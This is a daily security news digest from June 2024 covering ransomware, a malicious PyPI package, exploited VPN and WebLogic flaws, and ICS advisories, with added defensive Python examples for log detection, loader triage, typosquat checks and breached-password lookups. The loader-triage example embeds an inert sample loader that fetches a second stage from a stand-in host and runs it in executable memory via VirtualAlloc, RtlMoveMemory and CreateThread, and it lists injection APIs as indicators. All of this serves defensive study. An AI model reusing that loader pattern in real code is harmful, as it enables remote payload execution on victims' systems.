Daily Summary - 06.06.2024

End-of-Day report

Timeframe: Wednesday 05-06-2024 18:00 - Thursday 06-06-2024 18:00
Handler: Alexander Riepl
Co-Handler: Thomas Pribitzer

News

Qilin ransomware gang linked to attack on London hospitals

A ransomware attack that hit pathology services provider Synnovis on Monday and impacted several major NHS hospitals in London has now been linked to the Qilin ransomware operation.

https://www.bleepingcomputer.com/news/security/qilin-ransomware-gang-linked-to-attack-on-london-hospitals/


Linux version of TargetCompany ransomware focuses on VMware ESXi

Researchers observed a new Linux variant of the TargetCompany ransomware family that targets VMware ESXi environments using a custom shell script to deliver and execute payloads.

https://www.bleepingcomputer.com/news/security/linux-version-of-targetcompany-ransomware-focuses-on-vmware-esxi/


Brute Force Attacks Against Watchguard VPN Endpoints, (Wed, Jun 5th)

If you have a pulse and work in information security (or are a new scraping script without a pulse), you have probably seen reports of attacks against VPN endpoints. Running any VPN without strong authentication has been negligent for years, but in recent times, ransomware gangs, in particular, picked them off pretty quickly.

https://isc.sans.edu/diary/rss/30984
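The diary above reports brute-force traffic against VPN endpoints. As an added example for this digest (not code from the ISC diary), the following Python script shows the detection logic a SOC would run over VPN authentication logs: a per-source sliding window that flags repeated failures against one account, failures spread over many accounts from one source (password spraying), and a later successful login from a source that had already tripped an alert. The log format, IP addresses and usernames are constructed for the example; WatchGuard's real log format differs, so the regex is an assumption to be adapted to whatever your concentrator emits.

```python
"""Sliding-window detection of VPN brute-force and password-spraying attempts.

Added example for this digest, not code from the ISC diary. The log line
format below is constructed for illustration (it is not WatchGuard's real
syslog format); adjust LINE_RE to whatever your VPN concentrator emits.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one source hammering a single account, one source
# trying many accounts once each (spraying), and one user who simply mistyped.
SAMPLE_LOG = """\
2024-06-05T18:00:01 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:03 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:05 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:06 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:08 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:09 vpn: auth src=203.0.113.7 user=alice result=FAIL
2024-06-05T18:00:30 vpn: auth src=198.51.100.9 user=bob result=FAIL
2024-06-05T18:00:31 vpn: auth src=198.51.100.9 user=carol result=FAIL
2024-06-05T18:00:32 vpn: auth src=198.51.100.9 user=dave result=FAIL
2024-06-05T18:00:33 vpn: auth src=198.51.100.9 user=erin result=FAIL
2024-06-05T18:00:34 vpn: auth src=198.51.100.9 user=frank result=FAIL
2024-06-05T18:05:00 vpn: auth src=192.0.2.44 user=grace result=FAIL
2024-06-05T18:05:20 vpn: auth src=192.0.2.44 user=grace result=OK
2024-06-05T18:30:00 vpn: auth src=203.0.113.7 user=alice result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) vpn: auth src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse(lines):
    """Yield (timestamp, source, user, result) for every line that matches LINE_RE."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]


def detect(lines, window=timedelta(minutes=5), fail_threshold=5, spray_users=4):
    """Return {source_ip: [(alert_kind, detail), ...]} in the order alerts fired.

    brute_force        >= fail_threshold failures from one source inside the window
    spray              failures against >= spray_users distinct users from one source inside the window
    success_after_fail a successful login from a source that already triggered an alert
    """
    recent = defaultdict(deque)   # src -> deque of (ts, user) failures still inside the window
    alerted = set()               # (src, kind) pairs already reported, so each fires once
    alerts = defaultdict(list)
    for ts, src, user, result in sorted(parse(lines)):
        q = recent[src]
        while q and ts - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if result != "FAIL":
            # A success from a source that was already attacking is the event
            # that matters most: the attacker may now hold valid credentials.
            if any(s == src for s, _ in alerted):
                alerts[src].append(("success_after_fail", user))
            continue
        q.append((ts, user))
        if len(q) >= fail_threshold and (src, "brute_force") not in alerted:
            alerted.add((src, "brute_force"))
            alerts[src].append(("brute_force", len(q)))
        distinct = len({u for _, u in q})
        if distinct >= spray_users and (src, "spray") not in alerted:
            alerted.add((src, "spray"))
            alerts[src].append(("spray", distinct))
    return dict(alerts)


if __name__ == "__main__":
    for src, events in detect(SAMPLE_LOG.splitlines()).items():
        print(src, events)
```

The thresholds are deliberately low so the constructed sample trips them; in production, tune the window and counts to the concentrator's normal failure rate, and treat success_after_fail as the alert that warrants an immediate session kill and password reset rather than a ticket.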


Malicious Python Script with a "Best Before" Date, (Thu, Jun 6th)

The script's purpose is classic: it fetches a payload from a remote site, injects it into memory and starts a new thread. Such payloads are usually related to Cobalt Strike.

https://isc.sans.edu/diary/rss/30988
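The pattern described above (fetch a payload, write it into executable memory, run it in a new thread, gated by a kill date) can be triaged statically. The following scanner is an added example for this digest, not the script from the diary: it parses a Python file with the ast module, never executes it, and reports which indicator categories co-occur and which literal the script compares the clock against. The two sample scripts it is run on are constructed, inert inputs (an invalid URL, no payload); the indicator name lists are my assumptions and should be extended from your own sample set.

```python
"""Static triage of a Python file for the 'fetch, inject, run in a thread' loader
pattern plus a hard-coded expiry ("best before") check.

Added example for this digest, not the script from the ISC diary. The scanner
only parses source text with the ast module and never executes it; the two
sample scripts below are constructed, inert inputs (no real URL, no payload).
"""
import ast

# Callee names grouped by the behaviour they indicate (assumed lists, extend
# from real samples). The verdict requires several categories to co-occur.
INDICATORS = {
    "network": {"urlopen", "urlretrieve", "get", "post"},
    "memory": {"VirtualAlloc", "VirtualAllocEx", "RtlMoveMemory", "WriteProcessMemory", "memmove"},
    "thread": {"CreateThread", "CreateRemoteThread", "QueueUserAPC"},
}
CLOCK_CALLS = {"now", "utcnow", "today", "time"}

# Constructed, inert sample shaped like the loader the diary describes.
SAMPLE_LOADER = '''\
import ctypes, urllib.request
from datetime import datetime

# refuse to run after a hard-coded date ("best before")
if datetime.now() > datetime.strptime("2024-06-30", "%Y-%m-%d"):
    raise SystemExit(0)

data = urllib.request.urlopen("http://example.invalid/stage2").read()
buf = ctypes.windll.kernel32.VirtualAlloc(0, len(data), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(buf, data, len(data))
h = ctypes.windll.kernel32.CreateThread(0, 0, buf, 0, 0, 0)
'''

# Constructed benign sample: fetches something and prints the time, nothing else.
SAMPLE_BENIGN = '''\
import urllib.request
from datetime import datetime
print(datetime.now())
print(len(urllib.request.urlopen("http://example.invalid/").read()))
'''


def _callee(call):
    """Return the bare callee name of a Call node (attribute or plain name)."""
    f = call.func
    if isinstance(f, ast.Attribute):
        return f.attr
    if isinstance(f, ast.Name):
        return f.id
    return None


def scan(source):
    """Return indicator hits per category, any expiry literal, a score and a verdict."""
    tree = ast.parse(source)
    hits = {cat: set() for cat in INDICATORS}
    expiry = None
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _callee(node)
            for cat, names in INDICATORS.items():
                if name in names:
                    hits[cat].add(name)
        elif isinstance(node, ast.Compare):
            # A comparison between the current time and a literal is the shape
            # of a kill-date check; report the literal it compares against.
            parts = list(ast.walk(node))
            uses_clock = any(isinstance(n, ast.Call) and _callee(n) in CLOCK_CALLS for n in parts)
            literals = [n.value for n in parts
                        if isinstance(n, ast.Constant) and isinstance(n.value, (str, int))]
            if uses_clock and literals:
                expiry = literals[0]
    score = sum(1 for names in hits.values() if names) + (1 if expiry is not None else 0)
    return {
        "hits": {cat: sorted(names) for cat, names in hits.items()},
        "expiry": expiry,
        "score": score,
        "verdict": "suspicious" if score >= 3 else "clean",
    }


if __name__ == "__main__":
    print(scan(SAMPLE_LOADER))
    print(scan(SAMPLE_BENIGN))
```

The expiry literal is worth extracting on its own: a sample that has passed its kill date will do nothing in a sandbox, so the analyst needs to roll the clock back before detonation.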


Hackers Target Python Developers with Fake "Crytic-Compilers" Package on PyPI

Cybersecurity researchers have discovered a malicious Python package uploaded to the Python Package Index (PyPI) repository that's designed to deliver an information stealer called Lumma (aka LummaC2).

https://thehackernews.com/2024/06/hackers-target-python-developers-with.html
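Typosquatted names like this one can be caught cheaply before install by comparing every requested name against an allowlist of the packages a project actually depends on. The following check is an added example for this digest, not code from the article or from PyPI: it normalises names as PEP 503 does and flags any requested name that is not in the allowlist but is within two edits of one. The KNOWN set is a constructed allowlist; it includes crytic-compile, which I take to be the legitimate package the fake name imitates (an assumption, since the article excerpt does not name it).

```python
"""Flag requested package names that are a small edit away from a known name.

Added example for this digest, not code from the article or from PyPI. KNOWN
is a constructed allowlist; crytic-compile is assumed to be the legitimate
package the fake "crytic-compilers" imitates.
"""
import re


def normalize(name):
    """PEP 503 normalisation: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


# Constructed allowlist of names the project is actually allowed to pull in.
KNOWN = {"crytic-compile", "slither-analyzer", "requests", "web3", "cryptography"}


def check(requested, known=KNOWN, max_distance=2):
    """Return (requested_name, closest_known_name, distance) for every requested
    name that is not in `known` but lies within `max_distance` edits of one."""
    findings = []
    for raw in requested:
        name = normalize(raw)
        if name in known:
            continue
        # sorted() makes the choice deterministic when two names tie
        closest = min(sorted(known), key=lambda k: levenshtein(name, k))
        d = levenshtein(name, closest)
        if d <= max_distance:
            findings.append((raw, closest, d))
    return findings


if __name__ == "__main__":
    for raw, closest, d in check(["Crytic-Compilers", "requests", "reqeusts", "numpy"]):
        print(f"{raw!r} is {d} edit(s) from allowed package {closest!r}: refusing to install")
```

Run it over a requirements file in CI before pip resolves anything; a name that is near an allowed package but not equal to it should fail the build, and a genuinely new dependency gets added to the allowlist by a reviewer rather than by the build.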


Prevent Account Takeover with Better Password Security

Tom works for a reputable financial institution. He has a long, complex password that would be near-impossible to guess. He's memorized it by heart, so he started using it for his social media accounts and on his personal devices too. Unbeknownst to Tom, one of these sites has had its password database compromised by hackers and put it up for sale on the dark web.

https://thehackernews.com/2024/06/prevent-account-takeover-with-better.html
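The practical counter to the scenario above is to check a password against a breach corpus before accepting it, without sending the password (or its full hash) anywhere. The following Python example is added for this digest, not code from the article: it implements the k-anonymity range lookup of the kind Have I Been Pwned's Pwned Passwords API uses, with the server side simulated locally over a constructed corpus (the passwords and counts in BREACHED are made up for illustration). The client sends only the first five hex characters of the SHA-1 and does the matching itself.

```python
"""Check a password against a breach corpus without revealing it.

The client sends only the first five hex characters of the SHA-1; the server
answers with every suffix under that prefix; the match is made locally. This
is the k-anonymity range lookup used by Pwned Passwords style services.

Added example for this digest, not code from the article. BREACHED is a
constructed corpus and its counts are made up for illustration.
"""
import hashlib

BREACHED = {"password": 9_000_000, "qwerty123": 300_000, "letmein": 150_000}


def sha1_hex(password):
    """Uppercase hex SHA-1, the form the range protocol exchanges."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Server-side index: 5-char prefix -> [(35-char suffix, times seen), ...]
BREACH_INDEX = {}
for _pw, _count in BREACHED.items():
    _h = sha1_hex(_pw)
    BREACH_INDEX.setdefault(_h[:5], []).append((_h[5:], _count))


def range_query(prefix):
    """Server side. Receives only a prefix, so it cannot tell which of the
    returned suffixes (if any) the client actually holds."""
    if len(prefix) != 5:
        raise ValueError("prefix must be exactly 5 hex characters")
    return list(BREACH_INDEX.get(prefix.upper(), []))


def pwned_count(password):
    """Client side. Returns how often the password appears in the corpus, 0 if never."""
    h = sha1_hex(password)
    for suffix, count in range_query(h[:5]):
        if suffix == h[5:]:
            return count
    return 0


def accept_new_password(password):
    """Policy a sign-up or password-change form would apply."""
    n = pwned_count(password)
    if n:
        return False, f"rejected: seen {n} times in breach data"
    return True, "accepted"


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple"):
        print(candidate, "->", accept_new_password(candidate))
```

The reuse problem in the story is what makes this check necessary: a password that is strong against guessing is still worthless once a different site leaks it, so the check belongs at every place a password is set, not only at the bank.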


7-year-old Oracle WebLogic bug under active exploitation

Experts say Big Red will probably re-release the patch in an upcoming cycle.

https://www.theregister.com/2024/06/06/oracle_weblogic_vulnerability_exploited/


Exploitation of Recent Check Point VPN Zero-Day Soars

GreyNoise has observed a rapid increase in the number of exploitation attempts targeting a recent Check Point VPN zero-day.

https://www.securityweek.com/exploitation-of-recent-check-point-vpn-zero-day-soars/


Ransomware: FBI has access to 7,000 LockBit keys and gives victims hope

The fight against LockBit is still ongoing. Thanks to seized keys, further victims should now be able to regain access to their data.

https://heise.de/-9749844

Vulnerabilities

2024-06-04: Cyber Security Advisory - KNX Secure Devices FDSK Leak and replay attack

https://search.abb.com/library/Download.aspx?DocumentID=9AKK108464A0803&LanguageCode=en&DocumentPartId=&Action=Launch


Cisco Finesse Web-Based Management Interface Vulnerabilities

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew


Vulnerabilities Patched in Kiuwan Code Security Products After Long Disclosure Process

https://www.securityweek.com/vulnerabilities-patched-in-kiuwan-code-security-products-after-long-disclosure-process/


Emerson Ovation

https://www.cisa.gov/news-events/ics-advisories/icsa-24-158-02


Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch

https://www.cisa.gov/news-events/ics-advisories/icsa-24-158-03


Emerson PACSystem and Fanuc

https://www.cisa.gov/news-events/ics-advisories/icsa-24-158-01


Johnson Controls Software House iStar Pro Door Controller

https://www.cisa.gov/news-events/ics-advisories/icsa-24-158-04


K000139901: PyYAML vulnerability CVE-2017-18342

https://my.f5.com/manage/s/article/K000139901